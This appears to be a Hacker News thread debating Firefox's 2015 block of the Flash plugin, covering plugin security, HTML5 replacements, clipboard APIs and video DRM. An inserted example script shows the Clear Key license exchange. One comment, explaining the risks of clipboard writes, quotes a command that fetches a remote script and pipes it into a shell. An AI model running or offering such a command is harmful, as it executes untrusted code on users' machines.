I am not sure the attack vector argument is 100% valid here, as flash replacement technologies constantly add attack vectors to modern browsers, too. Many traditional Flash features are now covered by webGL accelerated browser functionality, like accelerated 2D canvas elements. My guess would be that this browser-gpu bridge creates a whole zoo of GPU driver related security issues which attackers might focus on once flash is completely obsolete. (My money is on a remote code execution vulnerability in the Firefox Adobe DRM module.)
Turing-complete machine running untrusted code is a nightmare for security. There will always be bugs and exploits, it's just a matter of time and effort to find them.
JavaScript enabled by default is already bad enough. We don't need Flash, Java, ActiveX or anything similar turned on by default. So it's a good move from a security viewpoint. Less attack surface.
They do get more bad press than perhaps others should. There is already a perception about Flash that it is not a great product, which feeds into this. Reasons are varied.
- Performance has not been good on Macs (my 2007 Macbook Pro literally burned my legs when running anything flashy)
- Flash updates mechanism seems a little spammy.
- Long-term perception of Adobe as a maker of a somewhat buggy, somewhat bloated software
- Steve Jobs' public denigration
- Backlash against proprietary standards being used on the web
The best thing about click to play Flash is it puts a stop to autoplay videos on the less reputable sites I occasionally and shamefully glance at for sports news.
I don't think the hate comes from bugs or exploits.
I think people hate flash because it is laggy, slow, makes things move on your screen you don't want, is widely used for ads or to shit on the user experience, etc.
Granted most of it might be bad programming, but I still think it comes from here rather than exploits.
In general, plugins are supposed to improve a product by adding or enhancing existing features. Flash however enables websites to break out of the HTML, CSS and JS environments and their security constraints, which should mean that flash has a larger responsibility regarding security. If Flash lived under the constraints of the browser's own security, then flash bugs would barely register as newsworthy.
Another point that hasn't been raised yet: Flash is a much smaller software than a browser, how come it has more bugs? It certainly speaks for its internal code quality.
Cost/benefit seems higher for Flash/Java than browsers. You really need a browser, but you don't really need a [fancy thing that can't be done in JS]. As another commenter said, it doubles your attack surface and for little benefit.
Flash game enthusiasts would probably disagree, but most of us can probably do without it given the risk.
As an enthusiast for a handful of flash games, it is increasingly tempting to make a VM just for running them. Even then, with all the progress in Javascript, it's questionable whether I should bother.
Hey, thanks for the headsup. We had an old component that we used as a fallback for certain kinds of videos that was always active. It was a legacy component that just got forgotten. I removed the Flash fallback about half an hour ago, so this shouldn't be showing up anymore.
Something I noticed after making my Flash click-to-activate a while back. That seems like a HUMONGOUS tunnel to create in order to allow copy to clipboard, and fairly irresponsible on GitHub's part.
What developer doesn't know how to copy to clipboard?
Github claims that the flash version is "currently the only reliable way to put data in the clipboard". This seems to indicate that they looked at the native browser option and found it unacceptable for their use case.
Thanks for that link, I hit this problem a while ago, a program I wrote generates HTML results where I want to cut & paste sections into another file. I couldn't find a way to do so in javascript previously.
The parent comment has been deleted, so I don't know what privacy problems they are referring to, however there is a potential security issue in allowing javascript write access to the clipboard. e.g. an evil website could repeatedly stuff code into the clipboard, so the next time you paste something into a terminal window, you end up with a 'curl http://www.example.com/hack.sh | sh' command and not the text you expected...
The other concern is bugs in the implementation that injects clipboard access into the JavaScript sandbox. Write-only might be the intent, but this could open up possibilities to gain read access.
They seem to use it for clipboard access, some repository links have a button that puts the URI in your clipboard automatically. I'm not sure if there is anything else they are using it for.
The final act of HTML5 delusion - it becomes "ready" because we say it's "ready". It's just someone forgot to ask Flash (game) developers' opinion. Not that it matters, right?
You really think the opinion of game developers should matter in a discussion about how to make browsers reasonably secure for people to use without getting their hosts compromised? Because I don't.
Anger towards browser developers or HTML5 is misplaced; you should be angry with Adobe for the fact that Flash is buggy, insecure, and closed-source.
>You really think the opinion of game developers should matter in a discussion about how to make browsers reasonably secure for people to use without getting their hosts compromised? Because I don't.
I agree, which is why I wish browser vendors would block WebGL by default.
I'm not holding my breath though, because the reality is that market demand from people like game developers (or at least, perceived demand) is what is driving the addition of so many complex new APIs to the web.
It's 2015 and it has been clear for at least 5 years that Flash was going to die eventually. If you still haven't migrated away or - worse - are still developing new apps in Flash, it's your own fault.
And since when do you have to please everybody? Flash developers are a minority, and they have no power to influence the market.
The sooner Adobe abandons the dead horse, the better for all of us. Kevin has gone away for years now, and Adobe's force is not based on Flash anymore (disclaimer: I own Adobe stock)
It's not like html5 has all of the features required to replace flash cross platform.
These changes force developers, especially those that work in video publishing to implement a variety of implementations for each device whereas flash gave us one platform that technically works on everything but is now disabled intentionally.
From the outside looking in, I have to imagine this has been on the industry's radar for a while. I mean flash has had some pretty steady hate for a while, coupled with advances with other mechanisms becoming increasingly robust. It may create more work but surely work that was not unexpected.
what, re-implementing their tech on a multitude of different browsers on desktop machines that previously worked fine?
I'm just pissed because IMO flash is being removed before the cross platform media objects in html5 have been implemented in full across all the browsers.
I'm just disappointed that browser makers caved to Flash-using media companies' demands and added closed-source DRM to the HTML spec. Thank you for demanding such an awful misfeature, Hollywood. Our starving culture will forever be in your DMCA debt.
I did the "click to activate" option for flash in firefox. I like it. (Safari and chrome can do this too). This way flash is activated when really needed.
I feel your pain. The university site I'm working on has flash protein visualizations. We're finally moving visualizations to js. We'll get there, but with flash being kinda turned off, users will have to turn it back on manually or our pages won't work till rid of flash.
Yesterday I was browsing a technology blog on my iPad and a javascript pop-up banner appeared over the page. The X button in the corner didn't work, I tapped it about 20 times. So I reloaded the page. Same thing happened. To read the article I had to disable javascript in the Safari settings and reload page.
If you think unwanted annoyances only come from Flash, you're mistaken.
God will Flash just die already. Firefox is my primary browser and I run it without Flash. On the very odd occasion I need it I have IE in protected mode which has Flash built in. If a site does use Flash I will seek an alternative though as I hate it that much.
On a side note Firefox without Flash is so much smoother. IMHO it is the fastest and most stable browser when it doesn't have Flash bogging it down.
5 to 7 years ago I would have said the same thing, I hated Flash with a passion. But now, when it's almost gone for good, I see that it had its reasons. For example the new Google Street View is many times slower and lags so much as to give me motion sickness (when it's not blocking my browser) compared to the previous version, which was Flash-based, and which used to work like a charm.
The new Google Maps is also dramatically slower, laggier, and buggier than the old version which was a regular web app built to work on browsers from 2005.
I think the terribleness of recent Google web front-ends (not only Maps and Street View but also Search, Mail, Groups, Gplus, etc.) is mostly a product of incompetent management process internal to Google, rather than an indictment of web technology generally.
I've gone back to a desktop mail client (Thunderbird) and moved away from the web for this sort of thing myself.
As far as the web goes, I am very impressed at openstreetmap. That is fast, accurate and has more useful mapping data than anything else rather than fancy overlays and imaging.
While on vacation recently, I had to switch from Google Maps to OSMAnd. OSM map data was just as good for my purposes at least (arguably better), but the real motivating factor was just how fucking pathetic Google Maps on Android has become.
Just having it find my location became a chore. I'd be walking down the street looking at my phone the whole block, waiting for it to get my location. Many times it would show my location (with several miles of uncertainty) as being somewhere that I had not been for more than several hours. Other times it would just never find the location at all, not even having any idea what country, let alone city, I was in.
I downloaded OSMAnd and the province map data, and it was able to find my location within mere seconds every time. It was able to do it fast enough that if I clicked the power button as I was pulling my phone out of my pocket, it would have my position before my phone was in front of my face.
Unfortunately OSMAnd does not do transit routing, so I was attempting to use both at the same time. This gave me a direct comparison between how fast both were able to find my position, and how accurately. OSMAnd blows Google Maps away. I often resorted to typing in my "from" location in Google Maps, just so that I could use it to find routes for me while it was stalling on finding my location itself.
My location permissions were all correct. I tried wiping the application settings, with no luck. On the last day of my vacation I uninstalled all the google maps updates on my phone, and tried the version that shipped with it. It worked just fine.
If anybody else ever gets annoyed at Google Maps being unable to find their location in a timely manner, I highly recommend they try OSMAnd. It saved my vacation. As a bonus, it even behaves sensibly when on a boat.
Could never reproduce it consistently, and I'm always hesitant to file a bug without decent repro steps. Also, it seems to have been fixed in latest... maybe. Again, if I can't reproduce it consistently, I can't say if it's fixed or not.
So what I do in these situations is go to about:crashes, click on the appropriate crash id and look under the Related Bugs section. If there’s been a bug filed with the same signature then it’ll appear there. Alternatively, if it’s not been filed already you could click on ‘More Reports’ and look at the number of crashes. If it looks like a few you might want to file it with just the signature and no steps to reproduce; sometimes a signature and backtrace alone is enough to diagnose and fix (e.g. this one I filed recently: https://bugzilla.mozilla.org/show_bug.cgi?id=1163945 ).
The first version they bought and re-branded. The second version was developed in house using the purchased technologies. It's sad the stuff developed in house seems to be worse.
Flash should still have its legitimation as an authoring tool. I think the direct approach in which you can throw together a scene or an animation has its value. The tools you use influence design decisions. Of course, technology wise, we should be happy without it. But if you always start a project with coding first, it limits your thinking. I fancy all the nice webgl demos and data visualizations, but they mostly lack a meaningful human perspective. Authoring tools like Flash and Director did provide a different feedback loop, not a data point of view but a narrative one.
The company I work for makes interactive/animated training media. While I work as a coder doing mostly server-side stuff, I can vouch for the power that the Flash authoring environment provided. It was rather similar to something like Unity, with a tightly integrated scenegraph and coding environment. For our team of animators who (by necessity, not by choice) picked up some coding chops on the job, it was a huge blessing.
Moving everything over to web technology has been extremely painful for exactly one reason: lack of a decent authoring workflow for interactive animations. There's nothing that can even touch Flash in this regard.
Unfortunately Flash still fills a couple gaps in browser support: live video streaming and adaptive bit rate streaming (live or recorded).
I posted a similar comment about it the other day: [0]
Personally I would like to see HTTP Live Streaming (HLS) [1] implemented in all the browsers, it's a nice lightweight protocol and would be the path of least resistance since it's already used heavily in the mobile space.
Agreed. I was looking into this streaming/live video issue as well and there really is no cross platform method of doing this without having a Flash fallback.
For everything else however (like pre-recorded video, games via WebGL), Flash should be phased out.
Even for pre-recorded video you still need Flash if you want to implement adaptive bitrate streaming in order to provide multiple quality levels and have the client automatically switch between them rather than buffer.
> On a side note Firefox without Flash is so much smoother. IMHO it is the fastest and most stable browser when it doesn't have Flash bogging it down.
That is primarily because of the flash ads being dumped. An ad/flash/js blocker achieves much the same and then some by further reducing the latency to collect everything needed to render.
Tidal and Deezer are others which require flash. Both have desktop apps, however.. Tidal's desktop app is awful and laggy to the extent I prefer using the web interface; Deezer's Windows app lacks some features compared to the web player.
For browsers that support EME, they can use the "Clear Key" key system that is part of the EME standard. It's not as secure as other DRM (because the decryption key is briefly exposed on the client), but it does not require any third-party license server like Google Widevine, Microsoft PlayReady, or Adobe Primetime. For a streaming music service, it is probably an adequate deterrent for ripping streams.
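The Clear Key exchange that the comment above refers to, as an added example that is not part of the thread. It follows the JSON license request and JWK Set license formats defined for Clear Key in the W3C EME specification; the key store, key values and function names are constructed for illustration.

```javascript
// Added example (not from the thread): the W3C EME "Clear Key" JSON exchange.
// All keys, key IDs and function names below are constructed for illustration.

// Clear Key uses base64url without padding for key IDs and key values.
function toB64Url(buf) {
  return buf.toString('base64').replace(/\+/g, '-').replace(/\//g, '_').replace(/=+$/, '');
}
function fromB64Url(str) {
  return Buffer.from(str.replace(/-/g, '+').replace(/_/g, '/'), 'base64');
}

// Constructed key store held by the site: key ID (hex) -> 128-bit content key (hex).
const KEY_STORE = new Map([
  ['00112233445566778899aabbccddeeff', '0f0e0d0c0b0a09080706050403020100'],
]);

// Client side: the license request the CDM hands to the page in its 'message' event.
function buildLicenseRequest(keyIdsHex, sessionType = 'temporary') {
  return JSON.stringify({
    kids: keyIdsHex.map((hex) => toB64Url(Buffer.from(hex, 'hex'))),
    type: sessionType,
  });
}

// Site side: answer with a JWK Set. No third-party license server is involved,
// but the content key travels as a plain (unwrapped) JWK.
function buildLicense(requestJson) {
  const request = JSON.parse(requestJson);
  if (!Array.isArray(request.kids)) {
    throw new TypeError('license request has no "kids" array');
  }
  const keys = [];
  for (const kid of request.kids) {
    const keyHex = KEY_STORE.get(fromB64Url(kid).toString('hex'));
    if (keyHex === undefined) continue; // unknown key ID: issue nothing for it
    keys.push({ kty: 'oct', kid, k: toB64Url(Buffer.from(keyHex, 'hex')) });
  }
  return JSON.stringify({ keys, type: request.type || 'temporary' });
}

// The page script passes the license to session.update(), so it holds the raw
// key at that moment. This is the "briefly exposed on the client" property.
function keysVisibleToPage(licenseJson) {
  const visible = {};
  for (const jwk of JSON.parse(licenseJson).keys) {
    visible[fromB64Url(jwk.kid).toString('hex')] = fromB64Url(jwk.k).toString('hex');
  }
  return visible;
}

const sampleRequest = buildLicenseRequest(['00112233445566778899aabbccddeeff']);
const sampleLicense = buildLicense(sampleRequest);
console.log(sampleRequest);
console.log(sampleLicense);
console.log(keysVisibleToPage(sampleLicense));
```

With Widevine, PlayReady or Primetime the license is an opaque blob that only the CDM can unwrap, which is the difference the comment is pointing at.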
Every video on Facebook still relies on Flash though. So I'm not sure why they haven't put their money where their mouth is about it yet? Would make Facebook a lot more accessible in most cases for me not having to rely on Flash whatsoever just to view a video. I usually end up not watching a number of videos after I realize it won't let me watch them without Flash.
Facebook is migrating from Flash to HTML5 video. As of last week, they are serving HTML5 video to users running Windows 7+, including Firefox users. Firefox supports H.264 video on Windows Vista+ and OS X because those platforms ship H.264 decoders.
Will someone actually go ahead and implement the required features in the browsers? Last I checked there is still no cross-platform way to do video publishing without flash. The option we now all have is multiple platform specific implementations.
Mozilla performance dev here: Our data backs this up. 4 out of 10 of our top most frequent janks are due to Flash initialization. I'm working to make that all work asynchronously until the time comes when we can kill NPAPI altogether.
I find "Click to Play" makes for a better browsing experience, and think this is a fine move for Firefox.
Interestingly, Google Chrome recently moved in the opposite direction, and removed support for having Flash off by default and activating with a single click. Instead, they consider Flash to be "important plug-in content". While they allow you to have it off by default, rather than "click to play", they now require that you right click then pull down to "run this plugin" each time you want to activate: https://productforums.google.com/forum/#!topic/chrome/xPcpRB...
I presume this is because they want to discourage people from having Flash off by default, since this would mean they would miss too many Flash ads. I took this as an opportunity to try out some different browsers, and found that Opera met my needs slightly better than Firefox. If you are looking for an alternative to Firefox or Chrome, or just want to see what's out there, you might want to check it out too: http://www.opera.com/
ps. As an example of the new Google interface strategy, to show all the responses on the Google Chrome Help Forum link above rather than being forced to click on each one, you can press the 'o' key some random number of times until they appear: https://productforums.google.com/forum/#!topic/gec-answers-f...
I've seen this argument, but don't believe that removing the option for click-to-play improves security. I could believe this theory if the default was simultaneously changed to have Flash default to off, but as it is, the result is that more users will choose to keep the default where Flash is always on. Surely automatic activation is even less secure than a potentially hijackable click-to-play?
I don't believe the small mechanical difference in click activation actually makes a huge difference to uptake numbers, since the big leap is making the choice to have plugins not run by default, with the activation path making no noticeable difference since by then you've already filtered out most people, who just don't care about plugin activation. This feature is driven by the Chrome security/privacy teams, who would have reverted it by now if they saw a regression in usage.
I've been click to play on Firefox for a long time now. Faster, less annoying ads (I am okay with nonannoying ads; they help pay for the site), and sites rarely need flash anyway. I think only Gmail and github (for click to copy) need it
I uninstalled Flash a few days ago, because I didn't want to deal with the updates anymore. Since Flash was unbundled from Mac OS X it has become a pain to update. I simply don't understand why I need to go to the Adobe site to get the updates.
Flash isn't super relevant anymore anyway, the main thing it's used for on my computer is Flash tracking cookies, and I can do without those. I do wonder how some of the tracking and retargeting companies will deal with the decline of Flash though. We asked a partner to stop using Flash for tracking, their response was that it's the best way of doing user tracking. Hopefully they'll change their mind soon.
The update process is horrendous. Redirect to Adobe's website, follow a 3-step 'wizard' - where Step 2 is a placebo 10-second loading bar saying it is "initialising" - and Step 3 is an advertisement for installing other crap from Adobe.
After all that you have to download a DMG, close all your applications and reinstall from scratch. Why not just build in an auto-update in the background and be done with it...
On Windoze, I always go to google for "flash player distribution3" and install the MSI packages for enterprise deployment. That keeps me from the malware bundle.
On the Mac, it's easy, I use Chrome as my Flash jail. I use Safari all the time and the few times I need Flash I fire up Chrome and it's there. Don't have to worry about Flash hacks or Chrome battery drainage.
The only other place where I've found that flash is relevant is in auto-play videos, so now with flash installed but disabled is basically removing the auto-play 'feature', which is really neat.
Unfortunately in this case avoiding the problem won't make it go away.
Many old sites will stop working (my first site was done in flash) as well as many games that are still heavily played today by millions of people. Also flash IDE provides a good introduction to programming for self-taught kids these days: many of them still do their first code in flash after clicking on "that strange icon next to photoshop".
Overall this is a good example of prolonged trusting a binary blob. IMO we will always tend to do what is more comfortable and we should strive for openness and transparency in the tools that most people rely on every day.
The problem persists as long as there are people installing the plugin or "enabling" it.
We need a real open-source alternative to flash player.
> We need a real open-source alternative to flash player.
We quietly built the alternative to Flash over the last 10 years. It's called the web.
A standard document in the web browser can play audio, video, display vector graphics, utilise OpenGL, supports direct drawing via Canvas, and it is deeply scriptable with a mature, open programming language.
I need all of those things to look exactly the same in each and every browser, instead of corrupted icons or broken navigation because the developer tested it in Chrome for Windows but neglected, say, Iceweasel for Debian.
I have yet to find a non-flash game capable of doing that. And if the alternative is "we should discard this closed binary that works in every platform in favor of this free-but-browser-dependent stack", I find that odd.
Well then you don't want an open source Flash, because that will undoubtedly be different to the official one in the same way that browsers are different to each other.
The age old test of any platform is the ability to run games, and HTML5 just isn't there when put next to Flash or native apps. And I'm not talking the bleeding edge stuff, but simple things like getting sound to work between browsers (a task that Flash did very well). Although to be fair the gatekeepers of browsers are Apple and Google who want you to pay the app store tax.
Why? Copy FROM clipboard would be, sure. Copy TO clipboard... OK, I can come up with scenarios where it'd be a problem, but they're pretty far-fetched.
Run a timer overwriting your clipboard every 10ms. Prevent you from copying anything off a webpage and instead replacing it with a copyright notice. Etc., etc., etc.
Flash has offered these same clipboard APIs for years and these clipboard "attacks" have never been a problem before. I don't see how replacing Flash clipboard APIs with HTML clipboard APIs will change web developers' behavior.
That's like saying “The ‘Web’ can't display images, the ‘Web’ needs plug-ins to do so. Plug-ins like libjpeg or giflib”.
Right now, you can put a <video> or <audio> tag on a page and it will work in something like 95% of the browsers in use. That's already better than Flash and going up as IE8 users upgrade to newer versions of IE or install Chrome/Flash.
Sure, you can't rely on users not recompiling their browser to disable it but you also can't rely on 100% support for anything on the web – users disable image loading, plugins, stylesheets or JavaScript, install incredibly overzealous ad-blockers, use ISPs which tamper with page contents, etc.
When I wanted to start programming one of the things I tried was flash. I absolutely couldn't figure out what the fuck was going on even with tutorials, it's garbage.
That's strange, I found Flash programming very accessible. There's a huge amount of good learning material out there, and plenty of shortcuts and components you can use to do quite complex things.
Flash components were really interesting, and made it easier for non-programmers or designers to manipulate a user-friendly "API" of sorts within Flash. This was very powerful. Hugely underrated and conveniently forgotten by the Flash-haters.
In terms of accessibility, my first two "serious" coding projects in high school were an interactive library map and a Latin flashcard quiz game written in Flash and Perl, respectively. At the end of the projects, I decided to focus my efforts on the more intuitive of the two languages, Perl.
Granted, it's just an anecdote, but I wonder what I missed that made others find Flash so accessible.
In my experience at least, when I talk about "Flash programming" I'm not just referring to Actionscript, but the whole package, the whole Flash suite including manipulating the timeline and multimedia objects programmatically.
Sounds like you favour Perl over Actionscript. From what I know of both, they are not commonly compared! But as with many things in this business, it all depends on your needs, likes, and the project requirements.
When all browsers disable Flash, a ton of old artistic content will become inaccessible. I'm thinking specifically about Homestuck animations and minigames, but other people will have their own favorites. Is there a good transition plan?
However, it will also make it more secure by making it less of a target for hackers. If you have to enable it only for certain content … then great. That’s how it should be at this point.
I've been maintaining the FreeBSD port of the Flash 11 linux software for a year or so.
The one thing I have learned during that time is:
How to write a good VuXML entry.
I agree with the general sentiment of removing Flash, and will do my part in convincing others that FreeBSD (and, derived, PC-BSD and FreeNAS) should probably consider setting an expiration date for Flash, then at that date delete it.
I made it my new year's resolution in 2015 to have Flash disabled. For my use case, it works great. Longer battery, less heat, and the internet still works.
I do turn it on (enable) every now and then for some sites, but very few/infrequently and turn it off right after.
I have all plugins disabled by default on my Chrome. I assume it's mostly Flash. It's very little disruption, actually:
* Plugins can be enabled using one click;
* The "Copy shortcut" widgets are disabled by default. Too bad, 2 clicks instead of one.
* Some videos are disabled on some news website. Too bad they won't be able to auto-play.
* I very rarely encounter websites (less than once in a month) where invisible plugins are required, so I need to restart the page with all plugins activated. I think Google's Not-a-robot Captcha has difficulties with that, if I remember well.
"All versions of Adobe’s Flash Player plugin are currently deactivated by default, until Adobe releases an updated version to address known critical security issues."
This implies that it will be reactivated soon and this isn't a permanent block. It looks like the same mechanism that blocks old and vulnerable versions of plugins like Silverlight.
That said, I've not installed flash in years. I use Firefox as my main browser with no plugins and IE/Chrome have it embedded (both auto-update with no system restart required).
Flash always has security issues and Adobe do their best to fix them.
On the consumer side of things, flash is not so bad. Sure search engines couldn't read it but there is amazing content generated through it. The content is what matters and unfortunately the Web is littered with abusive flash objects auto playing videos, audio, full screen ads and those won't simply go away with flash.
At least with flash I can easily disable it. But those auto playing html5 videos and audios ads are just as annoying. Now I need plug ins to disable native capability.
It's only a matter of time until all ads move to the medium and we find ourselves complaining.
It's not really a matter of ads, ads move the internet so they will always be there. It's a matter of security, flash has always been a source of flaws to be exploited. Like.. always, sometimes "trying their best" was really not effective.
I wonder how the ad networks/agencies will respond to this if it becomes the norm across future competing browsers?
Flash ads (including video) can be horrid on CPUs, but they also often have higher CPMs than static, "cheaper" ads. Firefox seems to be blocking flash entirely. They’re also doing it in a way that the ad networks can’t tell, unlike Chrome. In other words, if I disable Flash in Chrome, the ads normally fall back to (cheaper) non-flash ads. On Firefox, I’m getting blank gray boxes.
For sites that depend on advertising to survive, hopefully the ad networks will update their inventory with alternative non-intrusive ads a.s.a.p. so this type of (admittedly much needed) evolution doesn't suck too many content providers down.
Good riddance. Hopefully, they not only deactivate it but remove Flash and Java altogether. These two have been nothing but constant security and performance issues. And without Flash, Firefox can finally work on GTK3.
Good news for you. In September 2015 Google is going to completely remove NPAPI support from Chrome. So the Unity3D plugin will no longer work in Chrome and likely no one will use it for new projects.
I have Chrome with flash installed (not that it gave me any choice), but other than that I haven't had flash for maybe two years. If I need to play Flash, I just open Chrome for that. Facebook is one of the last common offenders with its flash videos on desktop version. I can't comprehend why...
AFAIK, the only way for javascript on a website to copy something into your clipboard is through Flash. It might be a good thing to prevent such functionality, but I wonder if Firefox took this into consideration.
I find it amusing that visiting that same page triggers the 'Firefox has prevented the outdated plugin "Adobe Flash" from running on support.mozilla.org.' warning.
Looks like Chrome now deactivates Flash by default too - it says "Adobe Flash Player was blocked because it is out of date" & I get directed to this link https://support.google.com/chrome/answer/6258784
Edit: Ah, looks like I needed to update Chrome with the fix.
Keep in mind that the Flash plugin bundled with Chrome uses PPAPI and runs inside a sandbox. So some exploits don't affect that version at all due to the different architecture, and to escalate privileges a Chrome sandbox exploit would be needed as well.
If only Firefox actually supported my AMD APU, then I wouldn't have to use Flash for YouTube and such. I actually force YouTube to play using the Flash player, as with HTML5 the video freezes and is very choppy. My mother is using Linux Mint, and for her the reverse is true, Flash is horrible and HTML5 is smooth and fast.
Sounds nice, but sometimes I'm on a page in Safari (with Click To Flash active) and I can't get a page to load at all after "clicking to flash" once. I think there must be some additional flash file that I don't get the chance to click or some moment that passed so it can't load.
I've been trying to solve this on Ubuntu 14.10. There does not seem to be an update path. I've installed the deb on https://get.adobe.com/flashplayer/ which does not resolve it.
"All versions of Adobe’s Flash Player plugin are currently deactivated by default, until Adobe releases an updated version to address known critical security issues."
I uninstalled/disabled flash on all my systems a few months ago, and have noticed barely any impact on my browsing. The only site I can think of that doesn't work is BBC News.
Adobe promising an update "during the week of July 12th"... That was last week. Or are they for some reason counting last week's Sunday as part of this week?!
Seems like only a temporary block. Mozilla isn't brave enough to put it out of its misery like it belongs. Still some big sites using it though, like Twitch.
My firefox has been blocking flash for a while (I've not updated it, so it doesn't load the old version.). The only site I switch to Chrome for has been twitch.
For anything else html5 video has been generally working. I've noticed a lot fewer annoying adverts too which is a bonus.
If Mozilla finally managed to implement the encoding Twitch uses for mobile devices, I'd finally be able to uninstall that pile of shit. Sadly it's a licensing issue.
If only that were the case, but they're abandoning Silverlight. It was actually much more stable for me under Linux than Flash ever was sadly, but they stopped developing Moonlight as well.
This is terrible for anyone who relies on Flash to get any kind of interactivity going inside the FB timeline.
It would have been better if FF would just display a warning and then let the user decide if they want the Flash content blocked or displayed.
Obviously it would be even better yet if FB would finally allow interactive HTML 5 content in its timeline.
He could have meant JDK, the server runtime many things in Java. And I know the thread I'm posting in. You do not need to tell me. You do not need to mention it like that.
Why on earth should Firefox ship a different HTML5 engine for Linux than for the other OSes? To me, it doesn't make a lot of sense to assume Firefox provides a better HTML5 implementation for all other operating systems.
With all due respect, this comment seems to be more of an overall anti-Linux sentiment.
Actually, Firefox uses the platform decoders to decode patented codecs like H264 or AAC. So the operating system does play a role. I also think it's not unreasonable to believe that hardware accelerated H264 decoding works less well on Linux.
Good catch. So replacing "HTML5" with "video codecs", this may have a point.
But I'm still wondering, as we have very good decoders from projects like FFmpeg and VLC. (Not sure which of all those decoders are used by Firefox.) These are platform independent and in my experience better than the platform specific libraries.
For example, I often hear that people install VLC under Windows because it decodes lots of video formats better than the natively available Windows Media Player. So the native Windows libraries probably aren't that good.
Also, at least the FFmpeg project explicitly states that they don't care about patent FUD, so we can safely assume they don't cripple their decoders in the fear of violating patents: https://www.ffmpeg.org/legal.html
Firefox can actually use ffmpeg as a decoder. It would be a great option for supporting a lot of these formats. However, Mozilla can't ship it enabled, because the patent problem is very real. See, for example, all of the Play Store apps that got C&D letters from Dolby for using ffmpeg's implementation of AC3.
Firefox does ship a lot of other video and audio codecs though, such as vorbis, opus, theora, vp8, and vp9. It's recommended to use these for HTML5 when possible because they can be easily supported everywhere.
Just a minor nitpick: Under Linux, people don't download from Mozilla but have it installed by default. If not, they install via package manager and not via download from Mozilla.
So it's not Mozilla making that decision, but the respective Linux distros. But of course they have the same problem.
I believe a good compromise would be to check if ffmpeg is installed on the system, and use it only when available. So the user would have to install ffmpeg directly.
That would be a very different situation from including code from ffmpeg directly into some app.
One option was to go down the Click-to-Play route which offers a HORRIBLE UX. Especially on Youtube which still uses Flash by default.
Disabling Flash however, Youtube actually seamlessly falls back to HTML video. Well done. But I can't help but think, outside the Youtube world (BBC for e.g.). LOTS is going to break. I wouldn't take this tack with my parents or clients.
This is something that Safari on OS X gets so right, that I've long been amazed (and annoyed when I have to use other browsers) that the other browsers don't copy the functionality.
In Safari, if you tab out a new page, it will load the content but pause it until you show the page. So you can tab out a bunch of video pages and they each only autoplay when you tab through them.
Wanting the same functionality on Chrome seemed to involve plugins or clicking (which has now turned into right clicking and choosing play).
If you disable Flash completely then Youtube works fine with HTML5 video. However, when Flash is set as click to play then Youtube still prompts to enable Flash. Annoying.
I'm late to respond to this, but this is really not true (speaking as a several-year (and current) user of click to play Flash).
I would suggest checking the https://www.youtube.com/html5 page sp332 suggested to see if you have checks in all those boxes and making sure you're using a recent version of whatever browser you're running[1]. Only if your browser doesn't support the needed html5 video features does it switch back to flash.
You can use this page to see if your browser will use HTML5 by default, and set a cookie to try HTML5 instead of Flash if it's not the default. https://www.youtube.com/html5
To be clear, by "blocked" Flash we really mean enforced click-to-activate. User choice is always a #1 priority at Mozilla.
We regularly block vulnerable plugins. What made this block different was that we did it before Adobe made an update available. Now that Adobe has released an update, it is no longer true that every version of Flash Player is blocked in Firefox.
However, we're glad to see the conversation this has sparked. Personally I align with Alex Stamos regarding Flash, in the thinking that a formal EOL would be great.
I'd also like to use this space to make a shameless plug for Shumway, a project set on building a faithful and efficient renderer for the SWF file format without native code assistance. Ending Flash doesn't need to mean an end for Flash media. http://www.areweflashyet.com/shumway/
Edit: typo